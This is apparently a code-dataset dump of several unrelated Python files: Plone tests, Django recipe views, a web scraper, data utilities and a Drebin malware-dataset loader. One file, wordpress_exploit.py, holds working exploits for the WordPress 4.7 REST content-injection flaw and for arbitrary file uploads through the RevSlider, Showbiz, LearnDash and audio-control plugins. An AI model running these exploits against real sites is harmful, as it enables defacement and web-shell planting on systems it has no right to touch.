'flashvideo_icon.gif'), ('allowed_content_types', ()), ('global_allow', True), ('filter_content_types', False))\n skin_files = ('FlowPlayerDark.swf', 'flashvideo_icon.gif', 'flashvideo_view', 'swfobject.js')\n\n def test_installation(self):\n \"\"\"Test if installation script works, regardless of\n use of portal_setup or portal_quickinstaller.\n - check if contet_type_registry updated\n - check if mimetypes_registry updated \n \"\"\"\n content_type_registry = getToolByName(self.portal, 'content_type_registry')\n mimetypes_registry = getToolByName(self.portal, 'mimetypes_registry')\n predicate_ids = content_type_registry.predicate_ids\n self.assertEqual('flv' in predicate_ids, True)\n self.assertEqual('video/x-flv' in predicate_ids, True)\n self.assertEqual(predicate_ids[(-1)], 'video')\n mimetypes = mimetypes_registry.lookup('video/x-flv')\n self.assertEqual(len(mimetypes), 1)\n self.assertEqual(mimetypes[0].extensions, ['flv'])\n self.assertEqual(mimetypes[0].icon_path, 'flashvideo_icon.gif')\n\n def test_mimetypes(self):\n \"\"\"Check if new mimetype x-flv is added during startup\"\"\"\n ext = mimetypes.guess_extension(FLASHVIDEO_MIMETYPE)\n self.assertEqual(ext, '.%s' % FLASHVIDEO_FILE_EXT)\n (typ, encoding) = mimetypes.guess_type('.%s' % FLASHVIDEO_FILE_EXT)\n self.assertEqual(typ, FLASHVIDEO_MIMETYPE)\n\n\nclass FlashVideoFunctionalTestCase(PloneFunctionalTestCase):\n \"\"\"Functional tests for view and edit templates\"\"\"\n __module__ = __name__\n portal_type = FLASHVIDEO_PORTALTYPE\n object_id = VIDEO_ID\n\n def test_createObjectViaWebDAV(self):\n \"\"\"Check if upload via WebDAV/FTP works:\n - file is created\n - dots and .flv suffix is removed\n - title is set\n \"\"\"\n\n def new_manage_afterPUT(self, data, marshall_data, file, context, mimetype, filename, REQUEST, RESPONSE):\n transaction.commit()\n self.old_manage_afterPUT(data, marshall_data, file, context, mimetype, filename, REQUEST, RESPONSE)\n\n FlashVideo.old_manage_afterPUT = FlashVideo.manage_afterPUT\n FlashVideo.manage_afterPUT = new_manage_afterPUT\n self.failIf('test_movie' in self.folder.objectIds())\n movie_file = self.getMovieFile()\n response = self.publish(self.folder_path + '/test_movie.flv', request_method='PUT', stdin=movie_file, basic=self.basic_auth)\n self.assertEqual(response.getStatus(), 201)\n self.failUnless('test_movie' in self.folder.objectIds())\n movie = self.folder.test_movie\n self.assertEqual(movie.portal_type, FLASHVIDEO_PORTALTYPE)\n self.assertEqual(movie.Title(), 'Test movie')\n self.assertEqual(movie.getContentType(), FLASHVIDEO_MIMETYPE)\n\n def test_createObjectByType(self):\n \"\"\"Test patched method, that is used for example in\n PloneFlashUpload\n \"\"\"\n obj = utils._createObjectByType(FLASHVIDEO_PORTALTYPE, self.folder, VIDEO_ID)\n self.assertEqual(VIDEO_ID in self.folder.objectIds(), True)\n movie = getattr(self.folder, VIDEO_ID)\n self.assertEqual(movie.portal_type, FLASHVIDEO_PORTALTYPE)\n\n def test_fileStorage(self):\n \"\"\"If FSS is installed stored video is an instance of FSS class.\n If not it is stored as OFS.Image\n \"\"\"\n portal_quickinstaller = getToolByName(self.portal, 'portal_quickinstaller')\n movie_file = self.getMovieFile()\n self.folder.invokeFactory(self.portal_type, id=self.object_id)\n movie = self.folder._getOb(self.object_id)\n movie.setFile(movie_file)\n file_ = movie.getFile()\n if portal_quickinstaller.isProductInstalled('FileSystemStorage'):\n from Products.FileSystemStorage.FileSystemStorage import VirtualFile as FileClass\n else:\n from OFS.Image import File as FileClass\n self.assertEqual(isinstance(file_, FileClass), True)\n\n\ndef test_suite():\n from unittest import TestSuite, makeSuite\n suite = TestSuite()\n suite.addTest(makeSuite(FlashVideoUnitTests))\n suite.addTest(makeSuite(FlashVideoFunctionalTestCase))\n suite.addTest(makeSuite(FlashVideoIntegrationTestCase))\n return suite\n\n\nif __name__ == '__main__':\n framework()","sub_path":"pycfiles/Products.FlashVideo-0.9-py2.4/test_FlashVideo.py","file_name":"test_FlashVideo.py","file_ext":"py","file_size_in_byte":11523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"484604488","text":"#-*- coding: utf-8 -*-\nimport requests,json,datetime,re\n \nclass wp_content_injection(object):\n \n def get_version(self,target):\n self.target = target\n r = requests.get(self.target).text\n version = re.findall('ver=(.*?)\"',r)\n if len(version) == 0:\n return None\n else:\n return version[0]\n \n def get_id(self,target):\n self.target = target\n content_id = []\n r = requests.get(f'{self.target}/wp/v2/posts')\n for i in r.json():\n content_id.append(i['id'])\n return content_id\n \n def post_inject(self,target,title,content_payload):\n self.target = target\n self.title = title\n self.payload = content_payload\n version = self.get_version(self.target)\n if version == '4.7' or version == '4.7.1':\n post_id = self.get_id()\n for _id in post_id:\n r = requests.post(\n f'{self.target}/wp/v2/posts/{str(_id)}/?id={str(_id)}',\n data = json.dumps({\n 'title':self.title,\n 'content':self.payload\n })\n )\n print(f'! Injecting Post ID : {_id}')\n else:\n print(f'[!] Wordpress version {version} Not Vulnerability')\n\nclass wp_revslider(object):\n\n def _wp_revslider(self,target,path_file,name_file):\n self.target = target\n self.path_file = path_file\n self.name_file = name_file\n post = requests.post(\n f'{self.target}/wp-admin/admin-ajax.php',\n data = {\n 'action':'revslider_ajax_action',\n 'client_action':'update_plugin'\n },\n files = {\n 'update_file':(self.name_file,open(self.path_file,'r').read())\n }\n )\n post.close()\n cek = requests.get(f'{self.target}/wp-content/plugins/revslider/temp/update_extract/{self.name_file}')\n return cek.status_code,cek.url\n\nclass wp_learndash(object):\n\n def _wp_learndash(self,target,path_file,name_file):\n self.target = target\n self.path_file = path_file\n self.name_file = name_file\n requests.post(\n self.target,\n data = {\n 'post':'foobar',\n 'course_id':'foobar',\n 'uploadfile':'foobar'\n },\n files = {\n 'uploadfiles[]':(self.name_file,open(self.path_file,'r').read())\n } \n )\n cek = requests.get(f\"{self.target}/wp-content/uploads/assignments/{self.name_file}\")\n return cek.status_code,cek.url\n\nclass wp_showbiz(object):\n\n def _wp_showbiz(self,target,path_file,name_file):\n self.target = target\n self.path_file = path_file\n self.name_file = name_file\n requests.post(\n f'{self.target}/wp-admin/admin-ajax.php',\n data = {\n 'action':'showbiz_ajax_action',\n 'client_action':'update_plugin' \n },\n files = {\n 'update_file':(self.name_file,open(self.path_file,\"r\").read(),'text/html')\n }\n )\n cek = requests.get(f\"{self.target}/wp-content/plugins/showbiz/temp/update_extract/{self.name_file}\")\n return cek.status_code,cek.url\n\nclass wp_audio_control(object):\n\n def _wp_audio_control(self,target,path_file,name_file):\n self.target = target\n self.path_file = path_file\n self.name_file = name_file\n requests.post(\n f'{self.target}/wp-admin/admin-ajax.php',\n data = {\n 'audio-filename':self.name_file,\n 'action':'save_record',\n 'course_id':'undefined',\n 'unit_id':'undefined'\n },\n files = {\n 'audio-blob':(\n 'blob',open(self.path_file,'r').read()\n )\n }\n )\n cek = requests.get(f'{self.target}/wp-content/uploads/{datetime.datetime.now().year}/{datetime.datetime.now().month:02}/{self.name_file}')\n return cek.status_code,cek.url ","sub_path":"lib/exploit/wordpress_exploit.py","file_name":"wordpress_exploit.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"350824759","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.cluster import KMeans\n\ndf = pd.read_csv('data/bai4.csv')\n\nX = df[['Toan1', 'Toan2', 'Toan3', 'Toan4']]\n\nkm = KMeans(n_clusters=2, random_state=0)\nkm.fit(X)\n\nprint(km.labels_)\nprint('Centers found by scikit-learn:')\nprint(km.cluster_centers_)\n\n# Đánh giá SSE (Nhỏ nhất là tôts)\nprint('Distortion: %.2f' % km.inertia_)\n","sub_path":"KMeans/TH3.3.py","file_name":"TH3.3.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"233107788","text":"#-*-coding:UTF-8\n'''\nCreated on 2016-8-3-11:15:25\nauthor: Gary-W\n'''\nimport os\nimport pickle\nimport shutil\nimport numpy as np\nimport json\n\n# get all dir' abs path in given dir\ndef get_dirlist(root_dir, includes=[], excludes=[]):\n \"\"\"\n sample:\n get_dirlist(r'../daytime_adaboost/pos')\n \"\"\"\n p = []\n fns = os.listdir(root_dir)\n for fn in fns:\n okey = 0\n if includes or excludes:\n for inc in includes:\n if inc in fn: okey = 1; break\n for exc in excludes:\n if exc in fn: okey = 0; break\n else:\n okey = 1\n if okey:\n fpath = os.path.join(root_dir, fn)\n if os.path.isdir(fpath):\n p.append(fpath)\n return p\n\n# get all files' abs path in given dir, subfix is variable len parameter\ndef get_filelist(root_dir, *subfixs):\n \"\"\"\n sample:\n get_filelist(r'../daytime_adaboost/pos',\".png\",\".jpg\")\n \"\"\"\n p = []\n for subfix in subfixs:\n p.extend([os.path.join(root_dir,f) for f in os.listdir(root_dir) if f.endswith(subfix)])\n return p\n\n# get all files' name.* in given dir, subfix is variable len parameter\ndef get_filenamelist(root_dir, *subfixs):\n p = []\n for subfix in subfixs:\n p.extend([f for f in os.listdir(root_dir) if f.endswith(subfix)])\n return p\n\n# get all files' abs path in given dir, prefix is variable len parameter\ndef get_prefilelist(root_dir, *prefixs):\n p = []\n for prefixs in prefixs:\n p.extend([os.path.join(root_dir,f) for f in os.listdir(root_dir) if f.startswith(prefixs)])\n return p\n\n# get all files' abs path in given tree, subfix is variable len parameter\ndef get_walkfilelist(root_dir, *subfixs):\n fullpath = [] # absolute path in the tree\n relate_path = [] # relative path in the tree\n len_root = len(root_dir)\n for root, _dirs, files in os.walk(root_dir): \n for filespath in files:\n for subfix in subfixs:\n if filespath.endswith(subfix):\n p = os.path.join(root,filespath)\n fullpath.append(p)\n relate_path.append(p[len_root+1:]) # backspace an \"\\\"\n return fullpath, relate_path\n\n# load json file as dict\ndef load_json(path):\n \"\"\"\n note: json str(\"...\"),'/', never end with \",\"\n \"\"\"\n js_table = None\n try:\n with open(path, 'r') as fr:\n js_table = json.load(fr)\n js_table[\"json_path\"] = path\n except IOError as ioerr:\n print(\"IO Error:\"+str(ioerr)+\"in:\\n\"+path)\n return js_table\n\n# pickle files\ndef store_pickle(path, obj):\n try:\n with open(path, 'wb') as fw:\n pickle.dump(obj, fw)\n except IOError as ioerr: print(\"IO Error:\"+str(ioerr)+\"in:\\n\"+path)\n\ndef load_pickle(path):\n try:\n with open(path, 'rb') as fr:\n obj = pickle.load(fr)\n return obj\n except IOError as ioerr: print(\"IO Error:\"+str(ioerr)+\"in:\\n\"+path)\n\ndef save_npy(path, dict_data):\n np.save(path, dict_data)\n\ndef load_npy(path):\n # this can be used in py3.5\n data_dict = np.load(path, encoding=\"latin1\").item()\n return data_dict\n\n# create dir of training set based on src_dir & dst_dir\ndef create_dirs(src_dir, dst_dir):\n \"\"\"\n src_dir include:\n class1, class2, ... dir etc\n dst_dir include:\n train, val, train.txt, val.txt\n \"\"\"\n label_names = os.listdir(src_dir)\n for label in label_names:\n train_dir = os.path.join(dst_dir,\"train\", label)\n val_dir = os.path.join(dst_dir,\"val\", label)\n if not os.path.exists(train_dir):\n os.makedirs(train_dir)\n if not os.path.exists(val_dir):\n os.makedirs(val_dir)\n return label_names\n\n\n# copy src dir-tree 2 dst dir-tree, only include the files with given subfix \ndef copy_n_sel(src, dst, *ig_subfixs):\n if not os.path.exists(dst):\n os.makedirs(dst)\n _, sel_corr_paths = get_walkfilelist(src, ig_subfixs)\n dst_list = []\n for sel_p in sel_corr_paths:\n dst_path = os.path.join(dst, sel_p)\n src_path = os.path.join(src, sel_p)\n parent_dir = os.path.split(dst_path)[0]\n if not os.path.exists(parent_dir):\n os.makedirs(parent_dir)\n print(\"copying \",dst_path)\n shutil.copyfile(src_path,dst_path)\n dst_list.append(dst_path)\n return dst_list\n\n\n# find a Drive including the target dir in root directory\ndef getTargetDisk(tar_file=\"Location_PoseNet_Code_Dataset\"):\n candidate = [\"E:\",\"F:\",\"G:\",\"H:\",\"I:\"]\n for d in candidate:\n if os.path.isdir(d):\n tmpath = os.path.join(d, tar_file)\n if os.path.exists(tmpath):\n return d\n print(\"no valid disk\")\n return \"\"\n\ndef get_filesize(fpath):\n \"\"\"\n return the size(string-type) of a file\n \"\"\"\n \n def formatSize(bytes_number):\n # turn bytes number into kb\\m\\g unit\n try:\n bytes_number = float(bytes_number)\n kb = bytes_number / 1024\n except:\n print(\"invalid input format\")\n return(\"Error\")\n if kb >= 1024:\n M = kb / 1024\n if M >= 1024:\n G = M / 1024\n return(\"%fG\" % (G))\n else:\n return(\"%fM\" % (M))\n else:\n return(\"%fkb\" % (kb))\n \n return formatSize(os.path.getsize(fpath))\n\nclass MagaDict:\n def __init__(self, config_dict):\n self.config_dict = config_dict\n\n def __getitem__(self, key):\n try:\n print(key,\":\",self.config_dict[key])\n return self.config_dict[key]\n except:\n return None\n \n def __setitem__(self,key,value):\n print('\"'+key+'\"',\"<==\",value)\n self.config_dict[key] = value\n \n def savefile(self, file):\n with open(file,\"a\") as fa:\n for key in self.config_dict:\n fa.write(str(key)+\":\"+str(self.config_dict[key])+\"\\n\")\n \n \ndef restore_logs_to_file(dst_file, src_strlog):\n with open(dst_file,\"w\") as fw:\n for log in src_strlog:\n fw.write(log+\"\\n\")\n\ndef restore_logs_from_file(src_file):\n src_strlog = []\n with open(src_file,\"w\") as fw:\n for log in fw:\n src_strlog.append(log.strip(\"\\n\"))\n return src_strlog\n\n\n\nif __name__==\"__main__\":\n pass\n\n\n","sub_path":"src/utils/dataio.py","file_name":"dataio.py","file_ext":"py","file_size_in_byte":6354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"485502688","text":"\"\"\"Tests for 7kyu module\"\"\"\n\nimport pytest\n\nfrom tasks.kyu7 import (\n sum_of_square,\n sequence_sum,\n triple_shiftian,\n replicate,\n where_is_vasya,\n new_avg,\n angle,\n series_sum\n)\n\n\n@pytest.mark.parametrize('first_three_elements,num,expected_output', [\n ([1, 1, 1], 25, 1219856746),\n ([1, 2, 3], 25, 2052198929),\n ([6, 7, 2], 25, -2575238999),\n ([6, 7, 2], 2, 2)\n])\ndef test_triple_shiftian(first_three_elements, num, expected_output):\n \"\"\"Tests triple_shiftian function\"\"\"\n result = triple_shiftian(first_three_elements, num)\n assert result == expected_output\n with pytest.raises(TypeError) as err:\n assert triple_shiftian(-737, 'string') is err\n\n\n@pytest.mark.parametrize('times, number, expected_output',\n [\n (3, 5, [5, 5, 5]),\n (5, 1, [1, 1, 1, 1, 1]),\n (0, 12, []),\n (-1, 12, [])\n ])\ndef test_replicate(times, number, expected_output):\n \"\"\"Tests replicate function\"\"\"\n result = replicate(times, number)\n assert result == expected_output\n with pytest.raises(TypeError) as type_error:\n assert replicate(\"2\", [1]) is type_error\n\n\n@pytest.mark.parametrize('number, expected_result',\n [\n (3, 180),\n (4, 360)\n ])\ndef test_angle(number, expected_result):\n \"\"\"Tests angle function.\"\"\"\n result = angle(number)\n assert result == expected_result\n\n\ndef test_new_avg1():\n \"\"\"Tests new_avg function\"\"\"\n assert new_avg([14, 30, 5, 7, 9, 11, 15], 92) == 645\n\n\ndef test_new_avg():\n \"\"\"Tests new_avg function\"\"\"\n with pytest.raises(ValueError):\n new_avg([14, 30, 5, 7, 9, 11, 15], 2)\n\n\ndef test_series_sum():\n \"\"\"Tests series_sum function \"\"\"\n assert series_sum(1) == \"1.00\"\n assert series_sum(2) == \"1.25\"\n assert series_sum(3) == \"1.39\"\n assert series_sum(5) == \"1.57\"\n with pytest.raises(TypeError) as type_err:\n assert series_sum('a') is type_err\n assert series_sum(-5) == '1.00'\n\n\n@pytest.mark.parametrize(\"people, bef, aft, expected_output\", [\n (3, 1, 1, 2),\n (5, 2, 3, 3)],\n ids=[\"(3, 1, 1)_2\",\n \"(5, 2, 3)_3\"])\ndef test_where_is_vasya(people, bef, aft, expected_output):\n \"\"\"Tests where_is_vasya function.\"\"\"\n result = where_is_vasya(people, bef, aft)\n assert result == expected_output\n with pytest.raises(TypeError) as type_err:\n assert where_is_vasya('a') is type_err\n\n\n@pytest.mark.parametrize('data', [\n (2, 6, 2, 12),\n (1, 5, 1, 15),\n (1, 5, 3, 5),\n (0, 15, 3, 45),\n (16, 15, 3, 0),\n (2, 24, 22, 26),\n (2, 2, 2, 2),\n (2, 2, 1, 2),\n (1, 15, 3, 35),\n (15, 1, 3, 0)\n])\ndef test_sequence_sum(data):\n '''Tests sequence_sum function'''\n begin_number, end_number, step, result = data\n assert sequence_sum(begin_number, end_number, step) == result\n with pytest.raises(TypeError) as type_err:\n assert sequence_sum(1.23, 'asd', (1, 2)) is type_err\n\n\n@pytest.mark.parametrize('number, expected_output',\n [\n (7, 3432),\n (13, 10400600),\n (17, 2333606220),\n (19, 35345263800)\n ])\ndef test_sum_of_square(number, expected_output):\n \"\"\"test sum_of_square function\"\"\"\n result = sum_of_square(number)\n assert result == expected_output\n with pytest.raises(TypeError) as type_err:\n assert sum_of_square(-77) is type_err\n","sub_path":"unittest/tasks_test/test_kyu7.py","file_name":"test_kyu7.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"361367514","text":"from django.shortcuts import render, reverse, HttpResponseRedirect\nfrom recipe.models import Author, RecipeItem\nfrom recipe.forms import RecipeAddForm, AuthorAddForm, LoginForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import login, logout, authenticate\n\n\ndef index(request):\n author = Author.objects.all()\n recipe = RecipeItem.objects.all()\n return render(request, 'index.html', {\"author_data\": author, \"recipe_data\": recipe})\n\n\ndef loginview(request):\n if request.method == \"POST\":\n form = LoginForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n user = authenticate(\n request,\n username=data[\"username\"],\n password=data[\"password\"]\n )\n if user:\n login(request, user)\n return HttpResponseRedirect(\n request.GET.get('next', reverse('homepage'))\n )\n form = LoginForm()\n return render(request, 'author_form.html', {'form': form})\n\n\n@login_required\ndef logoutview(request):\n logout(request)\n return HttpResponseRedirect(reverse('homepage'))\n\n\n# RECIPES\n\n@login_required\ndef recipe_edit(request, id):\n recipe = RecipeItem.objects.get(id=id)\n if request.method == 'POST':\n form = RecipeAddForm(request.POST)\n if request.user.author == recipe.author or request.user.is_staff:\n if form.is_valid():\n data = form.cleaned_data\n recipe.title = data['title']\n recipe.author = data['author']\n recipe.description = data['description']\n recipe.instructions = data['instructions']\n recipe.save()\n return HttpResponseRedirect(reverse('recipe_details', args=(id,)))\n form = RecipeAddForm(initial = {\n 'title': recipe.title, \n 'author': recipe.author,\n 'description': recipe.description,\n 'instructions': recipe.instructions, \n })\n return render(request, 'recipe_form.html', {'form': form})\n\n\n@login_required\ndef favorite_add(request, id):\n current_user = request.user.author\n favorite_recipe = RecipeItem.objects.get(id=id)\n current_user.favorite.add(favorite_recipe)\n current_user.save()\n return HttpResponseRedirect(reverse('recipe_details', args={id,})) \n\n@login_required\ndef favorite_remove(request, id):\n current_user = request.user.author\n favorite_recipe = RecipeItem.objects.get(id=id)\n current_user.favorite.remove(favorite_recipe)\n current_user.save()\n return HttpResponseRedirect(reverse('recipe_details', args={id,}))\n\n\ndef recipe_details(request, id):\n recipe = RecipeItem.objects.get(id=id)\n if request.user.is_authenticated:\n current_author = request.user.author.favorite.all()\n return render(request, \"recipe_details.html\", {\"recipe\": recipe, \"current_author\": current_author})\n return render(request, \"recipe_details.html\", {\"recipe\": recipe})\n\n\n@login_required\ndef recipe_add_views(request):\n html = \"recipe_form.html\"\n if request.method == \"POST\":\n form = RecipeAddForm(request.POST)\n if form.is_valid(): # MUST DO before every POST request\n data = form.cleaned_data\n RecipeItem.objects.create(\n title=data['title'],\n description=data['description'],\n instructions=data['instructions'],\n author=data['author']\n )\n return HttpResponseRedirect(reverse(\"homepage\"))\n form = RecipeAddForm()\n return render(request, html, {'form': form})\n\n\n# AUTHORS\n\ndef author_details(request, id):\n author = Author.objects.get(id=id)\n recipe_data = RecipeItem.objects.all()\n return render(request, \"author_details.html\", {\"author\": author, \"recipe_data\": recipe_data})\n\n\ndef author_add_views(request):\n form = AuthorAddForm()\n html = \"author_form.html\"\n if request.method == \"POST\":\n form = AuthorAddForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n new_user = User.objects.create_user(\n username=data['username'],\n password=data['password'],\n )\n new_user.save()\n new_author = Author(\n name=data['name'],\n bio=data['bio'],\n user=new_user,\n )\n new_author.save()\n return render(request, 'index.html', {'data': data, 'new_author': new_author}) \n return render(request, html, {'form': form})\n\n\n","sub_path":"recipe/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"407683335","text":"from time import sleep\nimport re\nimport webscrapers.utils\n\nurl_basic = \"https://www.essen-und-trinken.de\"\nurl_archive = \"https://www.essen-und-trinken.de/rezepte/archiv\"\n\nfilename_skipped_recipes = \"skipped_eut.txt\"\n\n\ndef save_eut_recipes(scraped_recipes):\n for origin, recipes in scraped_recipes.items():\n file_path = origin + '.json'\n webscrapers.utils.save_recipes_to_json_file(recipes, file_path)\n\n\ndef scrap_skipped_eut_pages(path):\n with open(path, 'r') as f:\n urls = f.readlines()\n\n skipped_recipes = []\n scraped_recipes = dict()\n\n for recipe_url in urls:\n recipe_url = recipe_url.strip('\\n')\n\n soup_recipe = webscrapers.utils.create_soup_object(recipe_url)\n recipe = scrap_essen_und_trinken_recipe(soup_recipe, recipe_url)\n\n if all(['essen_und_trinken' not in recipe['origin'], 'Für_jeden_Tag' not in recipe['origin'],\n 'essen_und_trinken' not in recipe['origin']]):\n continue\n\n if recipe['origin'] not in scraped_recipes:\n scraped_recipes[recipe['origin']] = dict()\n scraped_recipes[recipe['origin']]['recipes'] = [recipe]\n\n else:\n scraped_recipes[recipe['origin']]['recipes'].append(recipe)\n\n sleep(1)\n\n save_eut_recipes(scraped_recipes)\n\n if len(skipped_recipes) > 0:\n webscrapers.utils.save_skipped_recipes_to_txt_file(skipped_recipes, filename_skipped_recipes)\n\n\ndef scrap_essen_und_trinken_pages():\n skipped_recipes = []\n scraped_recipes = dict()\n\n for i in range(0, 1145):\n recipe_links = []\n\n print(\"Seite \" + str(i + 1) + \" von 1145\")\n\n url = url_archive + '?page=' + str(i)\n soup = webscrapers.utils.create_soup_object(url)\n\n page_recipe_overview = soup.find(\"div\", class_=\"panel-panel panel-col\")\n\n for a_element in page_recipe_overview.find_all('a', href=True):\n if 'rzpt' in a_element['href']:\n recipe_links.append(a_element['href'])\n\n sleep(1.5)\n\n for recipe_url in recipe_links:\n soup_single_recipe_page = webscrapers.utils.create_soup_object(url_basic + recipe_url)\n\n try:\n recipe = scrap_essen_und_trinken_recipe(soup_single_recipe_page, url_basic + recipe_url)\n except Exception:\n print(\"Rezept übersprungen: \" + url_basic + recipe_url)\n\n skipped_recipes.append(url_basic + recipe_url)\n sleep(1.5)\n\n continue\n\n if all(['essen_und_trinken' not in recipe['origin'], 'Für_jeden_Tag' not in recipe['origin'],\n 'essen_und_trinken' not in recipe['origin']]):\n continue\n\n if recipe['origin'] not in scraped_recipes:\n scraped_recipes[recipe['origin']] = dict()\n scraped_recipes[recipe['origin']]['recipes'] = [recipe]\n else:\n scraped_recipes[recipe['origin']]['recipes'].append(recipe)\n\n sleep(1.5)\n\n save_eut_recipes(scraped_recipes)\n\n if len(skipped_recipes) > 0:\n webscrapers.utils.save_skipped_recipes_to_txt_file(skipped_recipes, filename_skipped_recipes)\n\n\ndef get_origin_information_from_eut_recipe_page(soup):\n origin_element = soup.find(\"div\", class_=\"recipe-references\").find(\"div\", class_=\"source-reference\")\n\n if origin_element:\n return origin_element.text.split('\\n')[-1].strip(' ').replace(' ', '_').replace('/', '_')\n else:\n return \"essen_und_trinken\"\n\n\ndef get_servings_information_from_eut_recipe_page(soup, ingredients_element):\n servings_element = soup.find(\"div\", class_=\"servings\")\n\n if servings_element:\n return servings_element.text.strip()\n else:\n specific_serving_elements = ingredients_element.find(\"ul\", class_=\"ingredients-list\").find_all(\"li\",\n class_=\"ingredients-zwiti\")\n\n if len(specific_serving_elements) == 0:\n return 0\n else:\n return specific_serving_elements[0].text\n\n\ndef get_prep_time_information_from_eut_recipe_page(soup):\n prep_time_element = soup.find(\"div\", class_=\"time-preparation\")\n\n if prep_time_element:\n prep_time = soup.find(\"div\", class_=\"time-preparation\").text\n additional_prep_element = soup.find_all(\"div\", class_=\"time-addon\")\n\n if additional_prep_element:\n for additional_prep in additional_prep_element:\n prep_time += ' ' + additional_prep.text\n\n return prep_time\n else:\n return \"Nicht angegeben\"\n\n\ndef get_categories_information_from_eut_recipe_page(soup):\n category_page_element = soup.find(\"ul\", class_=\"taxonomies-list\")\n\n if category_page_element is None:\n return None\n else:\n categories_children = category_page_element.findChildren('li', recursive=False)\n categories = []\n\n for category_element in categories_children:\n categories.append(category_element.text)\n\n return categories\n\n\ndef get_ingredients_information_from_eut_recipe_page(ingredients_element):\n ingredients = []\n for ingredient_element in ingredients_element.find_all('li'):\n if len(ingredient_element.attrs) > 0:\n continue\n\n ingredients.append(re.sub(' +', ' ', ingredient_element.text.strip()))\n\n return ingredients\n\n\ndef get_prep_steps_information_from_eut_recipe_page(soup):\n prep_steps = []\n prep_steps_element = soup.find(\"ul\", class_=\"preparation\").findChildren(\"li\", class_=\"preparation-step\",\n recursive=False)\n\n for step in prep_steps_element:\n prep_steps.append(step.find(\"div\", class_=\"preparation-text\").text)\n\n return prep_steps\n\n\ndef get_recipe_titel_information_from_eut_recipe_page(soup):\n return soup.find(\"span\", class_=\"headline-title\").text\n\n\ndef scrap_essen_und_trinken_recipe(soup, recipe_url):\n ingredients_element = soup.find(\"section\", class_=\"ingredients\")\n\n recipe = {\n 'title': get_recipe_titel_information_from_eut_recipe_page(soup),\n 'url': recipe_url,\n 'page': 0,\n 'servings': get_servings_information_from_eut_recipe_page(soup, ingredients_element),\n 'prep_time': get_prep_time_information_from_eut_recipe_page(soup),\n 'categories': get_categories_information_from_eut_recipe_page(soup),\n 'ingredients': get_ingredients_information_from_eut_recipe_page(ingredients_element),\n 'steps': get_prep_steps_information_from_eut_recipe_page(soup)\n }\n\n return recipe\n\n\nif __name__ == '__main__':\n scrap_essen_und_trinken_pages()\n","sub_path":"webscrapers/essen_trinken_scraper.py","file_name":"essen_trinken_scraper.py","file_ext":"py","file_size_in_byte":6706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"321135552","text":"import json\nimport pandas as pd\nfrom dateutil import parser\n\n# import new json data\njson_file = open('cmc.json')\ndata = json.load(json_file)\njson_file.close()\n\n# convert json data to list\ndates = list(data['data'].keys())\nprices = list(data['data'].values())\n\n# get dates and prices from lists\ndates_datetime = [parser.parse(date.split('T')[0]) for date in dates]\nmarketcap_price = [price[0] for price in prices]\n\n# build dataframe\ndf = pd.DataFrame({'Date': dates_datetime, 'Price': marketcap_price})\n\n# load previous data\nprev_df = pd.read_csv('Total_CMC.csv')\nprev_df[\"Date\"] = pd.to_datetime(prev_df[\"Date\"])\nprev_df.rename(columns={'Market Cap': 'Price'}, inplace=True)\nprev_df.reset_index(drop=True, inplace=True)\nprev_df = prev_df[prev_df['Price'].notna()]\n\n# Merge old with new data\nmerge_df = prev_df.merge(df, how=\"outer\", on='Date')\nmerge_df['Price_x'].fillna(merge_df['Price_y'], inplace=True)\ndel merge_df['Price_y']\nmerge_df.rename(columns={'Price_x': 'Price'}, inplace=True)\n\n# Export to csv\nmerge_df.to_csv('Total_CMC.csv', index=False)","sub_path":"risks/TotalMarketCap/merge_cmc_data.py","file_name":"merge_cmc_data.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"185049710","text":"#!/usr/bin/python\n\nimport json\nimport os\n\n\"\"\"\n This package is responsible of loading the required data and to pre-process\n them before storing them back to JSON format.\n There are two different outputs: one for the classification routines and \n one for the detection routines. The first one takes into account malicious \n code only.\n\"\"\"\n\n\ndef fetch_data(dataset_path, store=False, from_json=False):\n if from_json:\n with open(\"drebin_preproc.json\", \"r\") as f:\n data = json.load(f)\n else:\n data = load_dataset(dataset_path)\n if store:\n with open(\"drebin_preproc.json\", \"w\") as f:\n json.dump(data, f)\n\n return preprocess(data)\n\n\ndef preprocess(data):\n return ()\n\n\ndef load_dataset(dataset_path):\n \"\"\"\n Loads data from Drebin dataset and stores the information of each file in a\n dictionary with the file data + the pair name: file_name\n\n :param dataset_path: path of the drebin dataset\n :return: list of dictionaries containing files data.\n \"\"\"\n data = []\n hash = []\n i=0\n for file in os.listdir(dataset_path):\n if i >= 200:\n break\n # load file data\n data.append(parse_file(dataset_path, file))\n hash.append(file)\n i = i+1\n return data, hash\n\n\ndef parse_file(dataset_path, file_name):\n \"\"\"\n Build dictionary with 8 features + name:\n 0 - apk_hash : SHA1 of the apk file as name\n 1 - req_hw : requested hardware components\n 2 - req_perm : requested permissions (eg. contacts access)\n 3 - app_comp : components, eg. activities, services\n 4 - filt_int : filtered intents\n 5 - rstr_api : restricted API calls that require a permission\n 6 - use_perm : effectively used permissions\n 7 - susp_api : suspicious API calls\n 8 - use_urls : used network addresses embedded in the code\n The first 4 features were taken from the manifest.xml file while the others\n from the disassembled code.\n\n :param dataset_path: path of dataset\n :param file_name: name of the file in the format of SHA1 of the apk\n :return: dictionary of features.\n \"\"\"\n #list = []\n file_dict = {}\n with open(dataset_path+\"\\\\\"+file_name, \"r\") as f:\n for line in f:\n file_dict[line.strip()] = True\n #info = 